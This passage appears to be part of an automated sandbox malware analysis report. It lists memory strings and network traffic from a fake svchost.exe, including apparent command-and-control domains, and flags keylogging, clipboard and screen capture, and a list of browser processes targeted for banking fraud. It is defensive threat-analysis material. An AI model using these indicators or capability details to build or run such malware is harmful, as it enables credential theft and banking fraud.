Source: svchost.exe, 0000000E.00000003.2680132228.0000017E5CAB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2708942646.0000017E5CAB3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2709183866.0000017E5CAB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2697887745.0000017E5CABB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3273987342.0000017E5CAB5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2648199352.0000017E5C307000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dg
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433762976.0000017E5C36B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000000E.00000003.2424665623.0000017E5C32C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfsuer
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2439857883.0000017E5C356000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433649128.0000017E5C357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C32C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425320529.0000017E5C35A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425829418.0000017E5C352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2424665623.0000017E5C329000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000000E.00000002.3271761277.0000017E5BA89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf~
Source: svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000000E.00000002.3271430200.0000017E5BA2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfl
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000000E.00000002.3272924032.0000017E5C337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2570505708.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000000E.00000002.3272292196.0000017E5BAE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000000E.00000002.3273747258.0000017E5CA81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com:443/RST2.srfityCRL
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000000E.00000002.3271653559.0000017E5BA61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf~
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000000E.00000003.2433705035.0000017E5C363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433615835.0000017E5C33B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srfsuer
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000000E.00000003.2438660213.0000017E5C327000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMM
Source: svchost.exe, 0000000E.00000002.3271567512.0000017E5BA46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000000E.00000003.2425245779.0000017E5C310000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: svchost.exe, 00000002.00000002.3273079170.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188535338.00000000008AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/
Source: svchost.exe, 00000002.00000003.3004653481.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000002.00000003.2655234712.000000000085F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/wp-json/
Source: svchost.exe, 00000002.00000002.3273031820.0000000002B77000.00000004.00000020.00020000.00000000.sdmp, login[2].htm0.2.dr, login[3].htm.2.dr, login[2].htm.2.dr	String found in binary or memory: https://nojs.domaincntrol.com
Source: svchost.exe, 00000002.00000003.2890817974.000000000086B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/
Source: svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.php
Source: svchost.exe, 00000002.00000003.2921485495.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.php8.162.203.202;178.162.203.211;178.162.203.226;178.162.217.107;5.79.71.2
Source: svchost.exe, 00000002.00000003.2921485495.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.phpbodis.com;::ffff:199.59.243.226;
Source: svchost.exe, 00000002.00000003.2853239843.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3272635102.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3004322075.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3188355967.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2192051912.0000000002B26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/m/
Source: svchost.exe, 00000002.00000003.2921538200.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/wp-json/
Source: svchost.exe, 0000000E.00000003.2433675117.0000017E5C340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://signup.live.com/signup.aspx
Source: svchost.exe, 00000002.00000003.3004421327.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2921538200.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905676121.0000000002BAF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 59543 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50846
Source: unknown	Network traffic detected: HTTP traffic on port 59539 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59539
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59543
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60696
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 50848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:59539 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:59543 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50848 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\apppatch\svchost.exe	Code function: [tab]	2_2_02D12B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	2_2_02D12B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	2_2_02D12B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [ins]	2_2_02D12B50

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D092D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,

2_2_02D092D0

Source: C:\Windows\apppatch\svchost.exe	Code function: 2_2_02D092D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	2_2_02D092D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 4_2_012E92D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	4_2_012E92D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 5_2_00E392D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_00E392D0
Source: C:\Program Files (x86)\RRkmQdZEHnQlzttcpVxlPLWGvqRptcHZnvnzFoJsQWyilrmXPqSEaWsDHJK\oOzTQCDSVNrWDmuGqzFbKRbZs.exe	Code function: 8_2_00E792D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_00E792D0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D250E0 GetDesktopWindow,GetWindowDC,_snprintf,CreateCompatibleDC,Sleep,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,

2_2_02D250E0

Source: C:\Windows\apppatch\svchost.exe

Code function: 2_2_02D12B50 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,

2_2_02D12B50

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D17300
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D17300
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	2_2_02D17300
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,IsUserAnAdmin,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,